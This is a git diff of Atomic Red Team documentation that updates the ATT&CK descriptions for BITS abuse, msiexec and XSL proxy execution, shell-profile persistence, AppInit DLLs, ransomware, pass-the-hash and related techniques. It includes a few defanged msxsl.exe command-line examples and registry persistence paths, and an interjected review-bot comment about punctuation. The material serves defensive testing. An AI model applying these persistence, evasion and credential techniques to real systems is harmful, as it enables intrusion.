Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. -The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin) +The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) -Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016) +Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. 
BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) -BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016)
+BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)
## Atomic Tests diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index 8d3ae33f..f34d481e 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -4,7 +4,7 @@ Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide) -This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) +This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) ## Atomic Tests diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md index 13563437..44f8b860 100644 --- a/atomics/T1218.007/T1218.007.md +++ b/atomics/T1218.007/T1218.007.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1218/007)
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. -Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.
+Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) ## Atomic Tests diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md index 18147a9c..b38e74bc 100644 --- a/atomics/T1220/T1220.md +++ b/atomics/T1220/T1220.md 
@@ -10,7 +10,7 @@ Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citati * msxsl.exe script[.]xsl script[.]xsl * msxsl.exe script[.]jpeg script[.]jpeg -Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) +Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic) diff --git a/atomics/T1222.002/T1222.002.md b/atomics/T1222.002/T1222.002.md index 4e59f547..607a4344 100644 --- a/atomics/T1222.002/T1222.002.md +++ b/atomics/T1222.002/T1222.002.md 
@@ -4,7 +4,7 @@ Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode). -Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). +Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). ## Atomic Tests diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index a54cc8cb..82bfd6ff 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md 
@@ -4,7 +4,9 @@ Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017) -To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018) +To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018). + +In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) ## Atomic Tests 
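Review bot: the modified line in atomics/T1485/T1485.md changes only the end of the sentence, adding a period after "(Citation: Talos Olympic Destroyer 2018)", so the sentence now ends ".(Citation: ...)." with a period on both sides of the citation block. Everywhere else in the description the period sits before the citations, so the trailing one looks like an upstream typo that the generator has faithfully copied; the new paragraph on deleting cloud storage, storage accounts and machine images is fine as written.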
diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md index 6602f8ee..b38a9f1f 100644 --- a/atomics/T1486/T1486.md +++ b/atomics/T1486/T1486.md @@ -2,7 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1486)
Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) -To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)
+To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) + +In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) ## Atomic Tests diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md index 7ff35bce..c3d686e0 100644 --- a/atomics/T1489/T1489.md +++ b/atomics/T1489/T1489.md @@ -1,8 +1,8 @@ # T1489 - Service Stop ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1489) -
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) +
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) -Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)
+Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)
## Atomic Tests diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md index d4882c10..39645569 100644 --- a/atomics/T1496/T1496.md +++ b/atomics/T1496/T1496.md @@ -2,7 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1496)
Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. -One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.
+One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) + +Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners) ## Atomic Tests diff --git a/atomics/T1497.001/T1497.001.md b/atomics/T1497.001/T1497.001.md index 763c7a77..055376e4 100644 --- a/atomics/T1497.001/T1497.001.md +++ b/atomics/T1497.001/T1497.001.md @@ -2,9 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1497/001)
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. -Specific checks may will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. +Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. 
Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. -Checks could include generic system properties such as uptime and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. +Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. diff --git a/atomics/T1546.004/T1546.004.md b/atomics/T1546.004/T1546.004.md index e7f9711c..e45a0307 100644 --- a/atomics/T1546.004/T1546.004.md +++ b/atomics/T1546.004/T1546.004.md @@ -1,12 +1,10 @@ -# T1546.004 - .bash_profile and .bashrc +# T1546.004 - Unix Shell Configuration Modification ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1546/004) -
Adversaries may establish persistence by executing malicious content triggered by a user’s shell. ~/.bash_profile and ~/.bashrc are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. +
Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. -~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the ~/.bash_profile script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the ~/.bashrc script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment. +Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. 
For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. -The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc. - -Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware)
+For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.
## Atomic Tests diff --git a/atomics/T1546.010/T1546.010.md b/atomics/T1546.010/T1546.010.md index 37cc8967..d0d2cd8b 100644 --- a/atomics/T1546.010/T1546.010.md +++ b/atomics/T1546.010/T1546.010.md @@ -1,6 +1,6 @@ # T1546.010 - AppInit DLLs ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1546/010) -
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Endgame Process Injection July 2017) +
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017) Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md index cb83a0d9..d04659d0 100644 --- a/atomics/T1546.011/T1546.011.md +++ b/atomics/T1546.011/T1546.011.md @@ -1,6 +1,6 @@ # T1546.011 - Application Shimming ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1546/011) -
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) +
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md index df5c047b..0387c735 100644 --- a/atomics/T1546.012/T1546.012.md +++ b/atomics/T1546.012/T1546.012.md 
@@ -8,7 +8,7 @@ IFEOs can also enable an arbitrary monitor program to be launched when a specifi Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) -Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. +Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index 510bef2f..3df5043a 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/001)
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. -Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. +Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. The following run keys are created by default on Windows systems: diff --git a/atomics/T1547.006/T1547.006.md b/atomics/T1547.006/T1547.006.md index a7e4fa19..cff18b2b 100644 --- a/atomics/T1547.006/T1547.006.md +++ b/atomics/T1547.006/T1547.006.md 
@@ -4,7 +4,7 @@ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) -Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. +Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation) Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)
diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md index 221e6340..3b5dc5f3 100644 --- a/atomics/T1550.002/T1550.002.md +++ b/atomics/T1550.002/T1550.002.md @@ -1,8 +1,10 @@ # T1550.002 - Pass the Hash ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1550/002) -
Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. +
Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. -Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.(Citation: NSA Spotting)
+When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. + +Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)
## Atomic Tests diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md index e9f49896..8c4fc94d 100644 --- a/atomics/T1550.003/T1550.003.md +++ b/atomics/T1550.003/T1550.003.md @@ -2,11 +2,13 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1550/003)
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. -In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) +When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. 
